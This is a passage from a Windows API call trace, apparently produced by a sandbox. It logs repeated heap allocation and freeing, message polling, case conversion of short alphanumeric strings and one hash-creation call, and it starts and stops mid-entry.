hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.754] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.754] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0251.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.755] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0251.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.756] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.757] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.757] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.758] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.758] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.758] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.759] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.759] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.759] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0251.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.759] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.761] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.761] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.761] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.761] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.762] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.762] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.762] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.762] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.762] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.762] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.763] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.763] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.763] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.763] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.763] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.763] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.764] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.764] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.765] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.765] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.766] CryptCreateHash (in: hProv=0xad2c70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, 